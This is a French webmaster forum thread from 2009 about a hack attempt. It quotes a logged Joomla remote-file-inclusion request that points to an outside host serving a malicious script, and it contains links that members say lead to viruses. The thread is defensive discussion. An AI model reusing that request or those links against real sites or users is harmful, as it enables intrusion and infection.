Tentative de Hack !

Consultez la formation Droit et Internet de WebRankInfo / Ranking Metrics


bilos
WRInaute impliqué
WRInaute impliqué
 
Messages: 946
Inscription: 11 Oct 2005

Tentative de Hack !

Message le Sam Juin 27, 2009 17:01

Salut à tous :)

Méfiez vous de l'adresse ip suivante : ip : [modéré OTP]

C'est un pirate qui ne cesse pas de réaliser des tentatives de hack en XSS :(

Voila le fichier qu'il teste avec -http://www.j-vision.co.kr/company/hotel/index.php/bo.do

Pour ma part je l'ai eu :)

J'ai sécurisé les paramètres qui peuvent passer des intrusions et j'ai placé un piège "alerte email ==> adresse ip , page en question et URL saisie pour pirater le code .

Voilà ce que je viens de recevoir :

Code: Tout sélectionner
ip : [modéré OTP] sur la page /fr/.../index.php?option=com_noah&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/hotel/index.php/bo.do???


C'est la réécriture des URLs qui m'a sauvé :) il croit que j'utilise joomla :mrgreen:

P.S: Je le trouve encore dans une liste noire :) -http://www.maran.pamil-visions.com/maranxssfilter.php

L'adresse ip est elle un moyen justificatif, si c'est le cas est ce que le log file d'un serveur est tenu en compte ?

Merci pour votre attention


biddybulle
WRInaute passionné
WRInaute passionné
 
Messages: 1619
Inscription: 30 Mai 2005

Re: Tentative de Hack !

Message le Sam Juin 27, 2009 19:31

Pour avoir été la cible d'un hack bien dissimulé. Je servais de relais également pour envoyer sans le savoir des attaques vers des passoires joomla.

Quand c'est en france, tu es prévenu plus facilement par le Centre d'Expertise gouvernemental de Réponse et de Traitement des Attaques informatiques qui indiquent avec grande précision les pages incriminées et te demandes de les supprimer expréssément et de combler tes failles faute de quoi ...

As tu envoyé un Abuse sur l'ip incriminé ?


bilos
WRInaute impliqué
WRInaute impliqué
 
Messages: 946
Inscription: 11 Oct 2005

Re: Tentative de Hack !

Message le Sam Juin 27, 2009 20:25

Je reçois la même requête sur une autre adresse [modéré OTP] :(

C'est pas cool !

Je sais bien que j'ai tout sécurisé alors même en cas de dégat mon hébergeur m'offre les backups.

Bon Weekend :)

benachem
WRInaute occasionnel
WRInaute occasionnel
 
Messages: 282
Inscription: 2 Mai 2009

Re: Tentative de Hack !

Message le Jeu Juil 02, 2009 18:07

tes liens envoient vers des virus, c'est normal ?


Leonick
WRInaute accro
WRInaute accro
 
Messages: 19599
Inscription: 8 Aoû 2004

Re: Tentative de Hack !

Message le Jeu Juil 02, 2009 20:19

benachem a écrit:tes liens envoient vers des virus, c'est normal ?
c'est la nouvelle tendance des spams de referer : le webmaster curieux va cliquer pour savoir qui lui a fait un lien et là, sans antivirus à jour, son pc est vérolé :evil:

j-mi
WRInaute accro
WRInaute accro
 
Messages: 3411
Inscription: 17 Mai 2005

Re: Tentative de Hack !

Message le Lun Juil 06, 2009 3:26

mais c'est vraiement honteux de lire un truc comme ça
c vicieux cette pratique
mais pourquoi fourguer des saleté dans les pc des gens


Leonick
WRInaute accro
WRInaute accro
 
Messages: 19599
Inscription: 8 Aoû 2004

Re: Tentative de Hack !

Message le Lun Juil 06, 2009 8:49

mi-mi a écrit:mais pourquoi fourguer des saleté dans les pc des gens
pour pouvoir prendre la main dessus


mookster
WRInaute occasionnel
WRInaute occasionnel
 
Messages: 382
Inscription: 5 Nov 2007

Re: Tentative de Hack !

Message le Mar Juil 07, 2009 13:37

Leonick a écrit:
mi-mi a écrit:mais pourquoi fourguer des saleté dans les pc des gens
pour pouvoir prendre la main dessus


ou vendre des anti-virus ? :)


Si vous avez aimé cette discussion, partagez-la sur vos réseaux sociaux préférés :

Formation recommandée sur ce thème :

Formation juridique : Droit et Internet : découvrez les risques que vous prenez liés à votre site web, vos conditions générales, vos contrats en ligne, etc. Formation animée par Maître Murielle Cahen, avocate à la Cour de Paris, spécialiste en droit des NTIC.

Tous les détails sur le site Ranking Metrics : programme, prix, dates et lieux, inscription en ligne.

Lectures recommandées sur ce thème :



Qui est en ligne

Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 0 invités